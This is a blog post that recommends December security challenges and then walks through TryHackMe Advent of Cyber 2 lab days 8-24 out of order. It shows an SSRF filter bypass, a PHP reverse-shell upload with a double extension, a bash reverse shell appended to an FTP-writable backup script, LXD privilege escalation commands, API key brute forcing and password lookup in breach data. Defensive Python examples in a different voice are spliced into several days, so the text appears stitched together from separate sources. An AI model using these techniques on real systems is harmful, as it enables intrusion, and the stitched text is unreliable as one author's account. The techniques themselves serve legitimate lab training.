Every year in December a good number of programming or security challenges surface in an Advent calendar style. They usually offer something new every day.
Of course there is way too much for anyone to take in at once, so I have made my pick. If you are still on the fence about what to try, maybe my list can give you some inspiration. All of them are free to participate in.
Advent of Cyber – TryHackMe.com
For the third time in a row the hands-on security education platform TryHackMe is launching their Advent of Cyber.
Every day you get a very beginner-friendly task in the realm of IT security. From web exploitation and network attacks to blue team tasks and OSINT, the variety is huge. There are always walk-throughs provided by well-known security content creators if you need assistance.
To motivate you they even sprinkle in some pretty cool prizes. Last year's event was a great way to introduce new people to the world of IT security.
I might have grown a bit out of the relatively easy tasks, but the creative and fun challenges still pique my interest.
I always noticed https://adventofcode.com/ in my social media bubbles in past years but never participated. But I feel like I have become a bit rusty with my coding, so I will do it this year!
Basically it is two coding puzzles every day, wrapped into a fun little story. Just check out the previous years if you want to get a good idea of what to expect.
Sans Holiday Hack Challenge
This probably is the most elaborate holiday-themed hack challenge. It only starts mid-December, but it features an isometric world you can walk in and interact with elves as well as Santa.
There are a lot of challenges spread around the world for you to tackle and progress the story. While they still remain beginner-friendly, the difficulty picks up quite a bit soon and you most likely will have to do a bit of research to complete them. There are always pointers to check out, though, as well as a very helpful community.
There also are a couple of talks paired with it. Overall my favorite holiday pastime in the last years.
Hack the Box is also running a Christmas-themed CTF with nice prizes this year, but it is only active until Dec. 5th.
It is a jeopardy-style CTF where you solve a set of challenges for points. If you are familiar with the HTB CTFs, this one is like them.
This year will have 5 tasks each in the categories web, crypto, pwn, reversing and forensics. The challenges are set at a beginner level but do not come with educational pointers.
As with the first, second and third part I have split the post to not get it too long.
Day 19 – The Naughty or Nice List
As in the previous days, we start by deploying the AttackBox and the challenge. Once both have had some time to load, we pull up the site in a browser.
We have a Naughty&Nice list search and an admin login. Let's put something into the search; bar in my case.
It tells us bar is on the nice list. In the URL bar, we notice where the search query leads us to:
This is URL-encoded. Using a URL decoder (for example CyberChef) we can make it read nicer:
It looks like it is requesting something from a different server for the search. This means we most likely can make it request other services too. It might be a Server-Side Request Forgery (SSRF) vulnerability, since we can make the server issue requests on our behalf.
Let's try accessing the same server by using http://10.10.154.156/?proxy=http://localhost as the proxy parameter.
Looks like there is a policy in place that prevents that. Other external URLs like google.com will give the same error.
It seems like the domain has to start with list.hohoho.
The challenge hint points right at it: we need to use localtest.me, which resolves to localhost, to bypass the hostname filter. So let's use list.hohoho.localtest.me as the proxy.
Ohh, this gives us a response:
This reveals the password and we can use that together with the username Santa to log into the admin panel.
There we can delete the naughty list, which will display the flag.
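The hostname check this day defeats is worth seeing from the defender's side. The following Python is an added example, not code from the challenge or from TryHackMe: it contrasts a prefix check of the kind described above (which accepts list.hohoho.localtest.me because it only looks at how the name starts) with a validator that requires an exact allowlist match and refuses any name that resolves into loopback or private address space. The allowlist entry list.hohoho, the fake DNS table and the addresses in it are assumptions made for the example.

```python
"""Weak vs. hardened validation of a user-supplied proxy URL (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# The only upstream the search feature should ever talk to (assumed name).
ALLOWED_HOSTS = {"list.hohoho"}


def weak_allows(url: str) -> bool:
    """Prefix check in the spirit of the challenge's filter: it only looks at
    how the hostname *starts*, so any name under a zone the caller controls
    that begins with the expected labels passes."""
    host = urlsplit(url).hostname or ""
    return host.startswith("list.hohoho")


def hardened_allows(url: str, resolve) -> bool:
    """Exact allowlist match plus a check on what the name resolves to.
    `resolve` maps a hostname to a list of IP strings; it is injected so the
    example runs offline (use dns_resolve below in real code)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username or parts.password:  # reject user@host confusion
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False
    addrs = resolve(host)
    if not addrs:
        return False
    # Even an allowlisted name must not point into loopback/private space.
    for ip in addrs:
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_reserved:
            return False
    return True


def dns_resolve(host: str) -> list:
    """Real resolver for production use."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed resolver standing in for DNS (addresses are made up).
FAKE_DNS = {
    "list.hohoho": ["93.184.216.34"],            # stands in for the real list server
    "list.hohoho.localtest.me": ["127.0.0.1"],   # localtest.me answers 127.0.0.1 for any label
    "localhost": ["127.0.0.1"],
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])
```

Two caveats for anyone putting this into a real service: the IP check and the actual connection must use the same answer (resolve once and connect to that address, or the client may be rebound to a different one between check and use), and the upstream response should still be treated as untrusted input.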
Day 20 – PowershELlF to the rescue
As before we deploy both attack box and the challenge.
First we ssh into the challenge box with ssh -l mceager 10.10.104.58, accept the fingerprint and enter the supplied password.
We end up in a Windows cmd prompt. Let's first upgrade to PowerShell.
With cd .\Documents\ we change into the Documents folder. Tab completion will help us. ls -Hidden reveals the folder's hidden content. With cat we can print the content of e1fone.txt.
Then we do the same loop with the Desktop: cd .. and cd .\Desktop\. Another ls -Hidden shows a new folder; we cd .\elf2wo\ into it. There are no hidden files in here, so we use ls without the hidden flag to show the files, and cat again to display its content.
For the third task we are supposed to search the Windows folder, so we cd C:\Windows\System32\ into it. There are a lot of files and we need to filter them down with ls -Hidden -Directory -Filter "*3*"
After changing into the folder, we will notice it has 2 hidden files. The first one, where we are supposed to count words, is pretty long. Too long for a manual count. We can use Measure-Object for that. We cat the file and pipe it to it: cat .\1.txt | Measure-Object -Word
To get specific words from the file, we can use PowerShell's ability to index the output like an array: (cat .\1.txt)[551, 6991]
For the final question we will use the Select-String cmdlet: cat .\2.txt | Select-String "redryder". And yes, I had to use the hint to realize it had to be in there as one word and lower case.
Day 21 – Time for some ELForensics
We deploy the machines and follow the guide in the challenge to connect via RDP.
After opening PowerShell, we change the directory to Documents. With ls we can check for files, then cat will print the file's content.
Get-FileHash -Algorithm MD5 .\deebee.exe gives us the MD5 hash of that file.
Luckily we have a strings tool on the machine so we can inspect the strings in that mysterious binary to find something interesting with c:\Tools\strings64.exe -accepteula .\deebee.exe, for example a flag.
The second stream is the one we are looking for. Using the stream related command in the description and the correct stream we can run the DB connector: wmic process call create $(Resolve-Path .\deebee.exe:hidedb)
It will open another command window with the DB access and a flag.
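Both things this day asks for, the hash of a suspicious binary and the readable strings inside it, are routine forensics steps that are worth scripting when there is more than one file to look at. The following Python is an added example and not the challenge's tooling: it reproduces what Get-FileHash and strings64.exe report (hashes, printable ASCII and UTF-16LE runs) and filters the runs for the flag format. The sample bytes, the THM{...} pattern and the minimum string length are assumptions made for the example.

```python
"""Hashing and strings extraction for a small binary blob (added example)."""
import hashlib
import re


def file_hashes(data: bytes) -> dict:
    """MD5 to match what the challenge asks for, SHA-256 alongside it because
    that is what any new indicator should be recorded with."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII, then runs of UTF-16LE (which Windows binaries
    use for many of their strings), at least min_len characters long."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


def find_flags(data: bytes, pattern: str = r"THM\{[^}]+\}") -> list:
    """Strings matching the CTF flag format (the pattern is an assumption)."""
    rx = re.compile(pattern)
    return [s for s in extract_strings(data) if rx.search(s)]


# Constructed stand-in for a binary: a two-byte header, zero padding, one
# ASCII string, one UTF-16LE string and some non-text filler.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"THM{example_flag}\x00\x00"
    + "hidden".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02\x03"
)

if __name__ == "__main__":
    print(file_hashes(SAMPLE_BINARY))
    for s in extract_strings(SAMPLE_BINARY):
        print(repr(s))
    print("flags:", find_flags(SAMPLE_BINARY))
```

Point it at a real file with open(path, "rb").read(); the UTF-16LE pass is what makes the difference on Windows executables, where a plain ASCII strings run misses every wide string.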
Day 22 – Elf McEager becomes CyberElf
We start with the usual deploy & RDP connection dance.
For the first task, it looks like the folder name is something encoded. Opening that in CyberChef and pulling over the Magic operation, we should get the password: thegrinchwashere. There we also see which encoding it was.
We can now open up the password file. The passwords are encoded as well, so we put them into CyberChef again. Magic does the trick.
For the final flag we have to look at the recycle bin.
That is JavaScript, and we can put it into the web developer console of our web browser.
This gives us a GitHub gist URL we can visit to get the flag.
Day 23 – The Grinch strikes again!
And once more we deploy and log in with RDP.
There is a ransom note on our desktop. The bitcoin address seems to be encoded in some way. The two == at the end hint that it might be base64. Using a decoder like CyberChef we will get the address.
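Both this day and Day 22 lean on CyberChef's Magic operation to recognise an encoding. The following Python is an added example, not part of the original post, showing how such a guess works: it applies the same heuristics the text uses (base64 alphabet with optional = padding and a length divisible by four, an even-length hex alphabet, the base32 alphabet) and keeps only candidates that decode to clean printable text. The sample inputs are constructed for the example; the base64 sample encodes the Day 22 password rather than the real ransom note.

```python
"""A small 'magic'-style decoder (added example)."""
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)


def _is_clean_text(text: str) -> bool:
    """True when every character is printable ASCII: the crude 'does this look
    like text' score that decides whether a candidate decoding is kept."""
    return bool(text) and all(c in PRINTABLE for c in text)


def _attempt(decoder, data: str):
    """Run one decoder; return the text only if it decoded and looks like text."""
    try:
        out = decoder(data).decode("utf-8")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    return out if _is_clean_text(out) else None


def guess_decodings(blob: str) -> dict:
    """Return {encoding_name: decoded_text} for every candidate encoding whose
    alphabet and length fit and whose output is clean text. An empty dict means
    none of these simple encodings applied."""
    s = blob.strip()
    results = {}
    # base64: alphabet A-Z a-z 0-9 + /, up to two '=' of padding, length % 4 == 0
    if len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        out = _attempt(base64.b64decode, s)
        if out:
            results["base64"] = out
    # URL-safe base64 uses - and _ instead of + and /
    if len(s) % 4 == 0 and ("-" in s or "_" in s) and re.fullmatch(r"[A-Za-z0-9_-]+={0,2}", s):
        out = _attempt(base64.urlsafe_b64decode, s)
        if out:
            results["base64url"] = out
    # hex: pairs of hex digits
    if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", s):
        out = _attempt(binascii.unhexlify, s)
        if out:
            results["hex"] = out
    # base32: upper-case letters and digits 2-7, length % 8 == 0
    if len(s) % 8 == 0 and re.fullmatch(r"[A-Z2-7]+={0,6}", s):
        out = _attempt(base64.b32decode, s)
        if out:
            results["base32"] = out
    return results


# Constructed samples.
SAMPLE_BASE64 = "dGhlZ3JpbmNod2FzaGVyZQ=="   # base64 of "thegrinchwashere"
SAMPLE_HEX = "48656c6c6f"                   # hex of "Hello"

if __name__ == "__main__":
    for sample in (SAMPLE_BASE64, SAMPLE_HEX, "!!!"):
        print(sample, "->", guess_decodings(sample))
```

The same approach scales to the layered encodings Magic handles by feeding each decoded result back into guess_decodings until nothing more applies.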
Looking around in our documents folder we find a lot of files that have been renamed.
Opening up the Task Scheduler and looking at the library, we will find an unusually named task, and under Actions it lists which .exe is run.
In the details of the Shadow Copy task, we will find the volume ID.
The Disk Management utility shows that there is a backup partition and we can assign it a drive letter to access it.
We need to set the explorer options to show hidden folders so we can see the hidden one.
Following the instructions of the final task, we get the last answer.
Day 24 – The Trial Before Christmas
For a final time we deploy the attack box and the challenge.
We don't know anything about the box, so we will run an nmap scan for all ports. This will take quite a while.
We find port 80 and 65000 open.
We bring up the site on port 65000 in the browser. You can find the title in the tab name or by looking at the source code.
Now it is time to bust out gobuster to do some directory and file brute forcing. Since we waited so long for the nmap scan, I take my chances and use only a small wordlist and the php extension.
Pulling up http://10.10.73.143:65000/uploads.php gets us to an upload form. But even if we upload legitimate images it gives us an "Invalid File-type" error.
Let's look at the source code by pulling up the web developer tools and using the debugger. There is a filter.js, and its check always returns false.
We start Burp, set the browser's proxy to it and edit the intercept exception rule so it no longer excludes .js. Then we reload the page and forward all requests but drop the request to filter.js.
Now we copy a default PHP reverse shell: cp /usr/share/webshells/php/php-reverse-shell.php ./rs.jpg.php. We include .jpg in the filename just in case there is a server-side file-type check in place. This will not fool every check, only very simple ones.
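Why the .jpg.php trick only beats very simple checks is easiest to see next to a check it does not beat. The following Python is an added example and not the challenge's server code: it contrasts a naive check that accepts a file as long as an image extension appears somewhere in the name (the kind of check the double extension is aimed at, and no better than the client-side filter.js) with a server-side check that looks only at the final extension and at the file's magic bytes, and then stores the file under a server-chosen name. The extension table, magic bytes and sample uploads are assumptions made for the example.

```python
"""Naive vs. strict server-side upload validation (added example)."""
import os

# Allowed image types with the magic bytes each one starts with.
IMAGE_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def naive_is_image(filename: str) -> bool:
    """Accepts if *any* recognised image extension appears in the name.
    rs.jpg.php passes, and the web server will still run it as PHP."""
    name = filename.lower()
    return any(ext in name for ext in IMAGE_TYPES)


def strict_is_image(filename: str, content: bytes) -> bool:
    """Only the last extension counts, and the bytes must match that type."""
    _, ext = os.path.splitext(filename.lower())
    magic = IMAGE_TYPES.get(ext)
    if magic is None:
        return False
    return content.startswith(magic)


def safe_stored_name(filename: str, content: bytes, server_id: str) -> str:
    """Never reuse the client's name on disk: store under a server-chosen id
    with the validated extension, in a directory the web server does not
    execute scripts from. Raises ValueError for anything that fails validation."""
    if not strict_is_image(filename, content):
        raise ValueError("rejected upload: not a recognised image")
    _, ext = os.path.splitext(filename.lower())
    return f"{server_id}{ext}"


# Constructed sample uploads.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # starts like a JPEG
PHP_BYTES = b"<?php echo 'not an image'; ?>"      # plainly not an image

if __name__ == "__main__":
    for name, data in (("photo.jpg", JPEG_BYTES), ("rs.jpg.php", PHP_BYTES)):
        print(name, "naive:", naive_is_image(name), "strict:", strict_is_image(name, data))
```

Magic-byte checks are not the whole story either (a valid JPEG with PHP appended still has the right header), which is why the stored name and a non-executing upload directory matter more than the filter itself.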
Now we edit the file to match our IP and specify a port. Then we start a netcat listener on that port with nc -lvnp 4444
Then we turn off intercept in burp and upload the file. Next we need to find the folder where it is stored. In our directory scan we found grid. Pulling that up in the browser, we find our uploaded file.
After clicking that, we should have a connection on our listener. First thing to do is to stabilize the shell. There are multiple ways of doing this but we will follow the guide in this challenge.
python3 -c 'import pty;pty.spawn("/bin/bash")'
followed by export TERM=xterm, CTRL+z and stty raw -echo; fg
With our shell stabilized, we can start to look around. whoami returns www-data, the usual user for the web server. This means our permissions are most likely restricted to the web server folders.
Let's have a look at those with cd /var/www/ and ls. There is our web.txt, and we can cat it.
There is another folder, TheGrid. We cd into it and look around. It has an include sub-folder, and there we find the DB credentials in dbauth.php.
Knowing the database credentials, we can connect to it with mysql -utron -p.
show databases; shows us the databases, and use tron; lets us select the one we need.
show tables displays the available tables and SELECT * From users; dumps the user data.
edc621628f6d19a13a00fd683f5e3ff7 looks like a hash (32 hex characters, the length of MD5). We can put it into a service like CrackStation to reveal the password.
After an exit in mysql, su flynn with that password allows us to become flynn on the shell. cd ~ takes us to the home folder, where we can cat user.txt
Now we need to escalate our privileges. id shows us which groups flynn is in.
flynn@light-cycle:~$ id
uid=1000(flynn) gid=1000(flynn) groups=1000(flynn),109(lxd)
LXD is a container tool similar to Docker. Membership in the lxd group is effectively root access, because a member can start a privileged container with the host's root filesystem mounted inside. Luckily the challenge provides us with a walk-through of how to exploit it.
First we check for available images.
flynn@light-cycle:~$ lxc image list
To start your first container, try: lxc launch ubuntu:18.04
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
Then we initialize the container lxc init Alpine foo -c security.privileged=true and add a device with the root filesystem lxc config device add foo bar disk source=/ path=/mnt/root recursive=true
lxc start foo starts the container and with lxc exec foo /bin/sh we get a shell in it.
cd /mnt/root/root gets us into the root folder where we can cat root.txt
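The lesson of this escalation for anyone administering Linux hosts is that some group memberships are root in disguise. The following Python is an added example and not part of the challenge: it parses an /etc/group file and reports every non-root user that sits in a group which is commonly root-equivalent (lxd, docker, sudo, wheel, admin, disk). The sample group file is constructed to mirror the id output above; the list of risky groups is an assumption you should adjust for your own distribution.

```python
"""Audit of root-equivalent group memberships (added example)."""

# Groups whose members can trivially obtain root on a typical Linux host:
# lxd/docker via a privileged container, sudo/wheel/admin via sudo rules,
# disk via raw access to block devices.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "admin", "disk"}


def parse_group_file(text: str) -> dict:
    """Parse /etc/group content into {group_name: set(members)}.
    Each line is name:password:gid:member,member,..."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed line, skip rather than guess
        name, _password, _gid, members = fields
        groups[name] = {m for m in members.split(",") if m}
    return groups


def find_root_equivalent_members(group_text: str) -> dict:
    """Return {user: sorted list of risky groups} for every non-root user
    that is a supplementary member of one of ROOT_EQUIVALENT_GROUPS."""
    findings = {}
    for group, members in parse_group_file(group_text).items():
        if group not in ROOT_EQUIVALENT_GROUPS:
            continue
        for user in members:
            if user == "root":
                continue
            findings.setdefault(user, []).append(group)
    return {user: sorted(groups) for user, groups in findings.items()}


# Constructed /etc/group excerpt modelled on the id output above
# (gid 109 for lxd, uid/gid 1000 for flynn).
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:
lxd:x:109:flynn
flynn:x:1000:
www-data:x:33:
"""

if __name__ == "__main__":
    with open("/etc/group") as fh:
        for user, groups in find_root_equivalent_members(fh.read()).items():
            print(f"{user}: member of {', '.join(groups)}")
```

Run it as part of a periodic host check; a web application account turning up in such a list is exactly the finding this day's privilege escalation relies on.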
That wraps up the Advent of Cyber 2 and earns us a nice certificate!
As with the first and second part I have split the post to not get it too long.
Day 14 – Where’s Rudolph?
This day I will keep a lot shorter and basically just give some additional hints.
For the first task we go to Reddit and open up a random user's profile. Then we replace the username in the URL with IGuidetheClaus2020. Then it is only a matter of clicking on Comments and you have the first URL.
Read through the posts; the second one gives you the next answer.
Robert is Rudolph's creator. Googling for rudolph creator will give you the third answer.
In his Reddit comments he talks about Twitter (Q4), and trying his Reddit username there, we find it is the same (Q5).
In his tweets he mentions a TV show, and that answers question 6.
For question 7 we can use Google's reverse image search and find out about the city.
Downloading the file and looking at the EXIF data of the image will give us a location (Q8) and a flag.
Rudolph has posted an email address in his Twitter bio. Putting that into https://scylla.sh/api (a search for data breaches) as the search term email:rudolphthered@hotmail.com will give us his password.
Using the GPS EXIF data from his image in Google Maps, we find that he is staying in the Marriott in Chicago. The street number is in the hotel details.
Day 15 – There’s a Python in my stocking!
The first question of today can be answered by running True + True in the Python interpreter, and the second one can be answered by reading the day's description.
bool("False") we can put into the interpreter again, and question 4 is another one for the description.
For the code analysis we could just put the code into the interpreter and see what comes out. But let's look at the code in more detail.
x = [1, 2, 3] creates a variable named x holding the list containing 1, 2 and 3.
y = x does not copy the list. Python variables are references to objects, so this creates a variable y that points to the same list object as x.
y.append(6) appends 6 to the one list that both y and x point to.
print(x) prints the list, which is now [1, 2, 3, 6].
Day 16 – Help! Where is Santa?
Since it gives us easier access to the challenge, we are going to use the attack box again. Deploy it and the challenge.
Pulling up the page in the web browser without any ports (meaning on 80), does not work, so we have to find the correct port.
A quick nmap scan should do the trick.
root@ip-10-10-226-56:~# nmap 10.10.244.23
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-23 03:55 GMT
Nmap scan report for ip-10-10-244-23.eu-west-1.compute.internal (10.10.244.23)
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
8000/tcp open http-alt
MAC Address: 02:7D:17:61:1D:3D (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
Now we can pull up the site with the browser.
The site suggests finding the link to the API with a Python script, and you should do that for practice if you haven't done much with Python yet.
But we can also view the source and search for api.
Accessing http://10.10.244.23:8000/api/ gives us a JSON response of {"detail":"Not Found"}. We have to supply the API key. The challenge warns us that the server will block us after a certain number of wrong attempts.
It also tells us that the key is between 1 and 100 and odd, which leaves 50 different keys to try.
Let's write a Python script to go through all potential keys:
# Import the requests library, which lets us make HTTP requests
import requests

# Loop over all potential API keys. The step size of two comes from the
# hint that the valid key is odd (1, 3, ..., 99).
for apikey in range(1, 100, 2):
    # Build the URL and make the request, storing the result in response.
    # To concatenate a string (the API URL) with a number (the key) we
    # need to convert the number to a string first.
    response = requests.get('http://10.10.244.23:8000/api/' + str(apikey), timeout=5)
    # Print the key together with the text of the response
    print(apikey, response.text)
In the console output of that script we will find the answers.
Day 17 – ReverseELFneering
First we deploy both boxes. Once they are up, we ssh into the challenge box with the provided credentials.
I highly recommend that you do the example file1 walk through provided in the challenge to get used to the tools.
We open the challenge file in radare2 with r2 -d ./challenge1 and start the analysis with aa. This will take a while.
pdf @main shows us the disassembly of the main function of the program.
In there we can already see what value is stored in local_ch first.
We can use two approaches here. The first is to go through the instructions and logically work out what should be in the variable asked for. But we can also use breakpoints and step through the instructions, then look at the memory. We will use the latter approach, even if the first would be faster in a simple program like this.
To find out what value is in eax when imul is executed, we can set a breakpoint at that instruction with db 0x00400b62, then run the program up to the breakpoint with dc.
Then we step through the instruction and look with px @eax at the memory content of eax.
Stepping one instruction further, we can use px @rbp-0x4 to get the content of local_4h. We know local_4h is at rbp-0x4 by looking at the top of main, where the variables are defined.
Day 18 – The Bits of Christmas
We start again with deploying the AttackBox and the challenge. After giving it 5 minutes or so to start, follow the guide on how to connect to the Windows remote desktop. Eventually you should see the desktop.
We open up the TBFC_APP with ILSpy and can start browsing through the decompiled code.
Spotting the CrackMe portion, we dig further into that. It looks like this is where the form is handled. We are interested in the main form.
Let's see what code the button will run when clicked:
Looks like there is a password check in there, and it references the correct password.
Further down is also the flag that will be printed out if the correct password is supplied. This already answers the questions, but we can of course also run the program, supply the password and see the flag.
For this challenge we do not need the AttackBox. We download the pcaps, and if we do not already have Wireshark installed, we will have to get that too.
For the first task, we open up the first pcap and put icmp into the filter bar to only see ICMP packets.
To see only the HTTP GET requests, we use the filter again. We filter for the HTTP GET method with http.request.method == GET.
For the next question we filter for the requested IP and the HTTP GET method with ip.addr == 10.10.67.199 && http.request
Looking through the requests should give us a good hint of what article he was searching for.
Next we open up the second pcap and utilize the filter once more. ftp should filter the requests down enough.
To find the encrypted protocol, we can sort by protocol and scroll through them. That should give a quick find.
For the last task we open up the third pcap. HTTP is a protocol often used for file transfer, so we filter for that.
Then we select the response and go to File->Export Objects->HTTP. In the next dialog we can select the .zip file.
In that zip we will find the wishlist and with it the final answer.
Day 8 – What’s Under the Christmas Tree?
For this day we are back to our beloved AttackBox. Deploy that and the challenge. While that is loading, spend some time googling for the first question. Wikipedia is a good source for the answer 😉
Now we scan the deployed box with nmap.
nmap 10.10.82.53
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
3389/tcp open ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds
The challenge wants us to experiment a bit with the -Pn, -sV and -A flags, and we do so. This should help us find the OS of the system, too.
I like to add -v to my nmap scans for more verbose output.
nmap -sV -v 10.10.82.53
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)
For the next task, we are supposed to run the http-title script. But that script was already run as part of our experiments with -A.
This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day, and you really should take the opportunity to play around a bit with nmap here.
Day 9 – Anyone can be Santa!
Today is all about FTP so let’s get the attack box and the challenge deployed.
First we connect to the server via ftp and have a look. We don't have credentials yet, so we go with anonymous. With ls we can list the directory's content, just like we do in the terminal.
There is only one folder we can access as anonymous. We use cd to change into it, then ls again to see the content.
There are two files, and we can download them to our AttackBox with get filename. In our local filesystem we open up the shopping list first and answer question 3.
Now it is time to open up the script in an editor.
#!/bin/bash
# Created by ElfMcEager to backup all of Santa's goodies!
# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";
# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp
# TO-DO: Automate transfer of backups to backup server
It is a backup script that absolutely should not be in the public folder. We even have permission to upload to that folder, which means anyone with anonymous FTP access can change what the backup job will execute.
We append a simple bash reverse shell to the script and save it. The IP in there needs to be your AttackBox IP, not the one from the challenge.
Before we upload the modified script, we need to set up a listener for our reverse shell. nc -lvnp 4444 does the trick.
Now we can upload the script with put in ftp.
After a minute or two, we should get a connection on our listener.
With cat /root/flag.txt we read our final flag.
Day 10: Don’t be so sElfish
As always we deploy the AttackBox and the challenge. First we run enum4linux with -U to enumerate users.
root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020
==========================
| Target Information |
==========================
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.180.212 |
=====================================================
[+] Got domain/workgroup name: TBFC-SMB-01
======================================
| Session Check on 10.10.180.212 |
======================================
[+] Server 10.10.180.212 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.180.212 |
============================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==============================
| Users on 10.10.180.212 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceagerDesc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020
This gives us the users. Now we also enumerate the shares:
root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020
==========================
| Target Information |
==========================
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.180.212 |
=====================================================
[+] Got domain/workgroup name: TBFC-SMB-01
======================================
| Session Check on 10.10.180.212 |
======================================
[+] Server 10.10.180.212 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.180.212 |
============================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==========================================
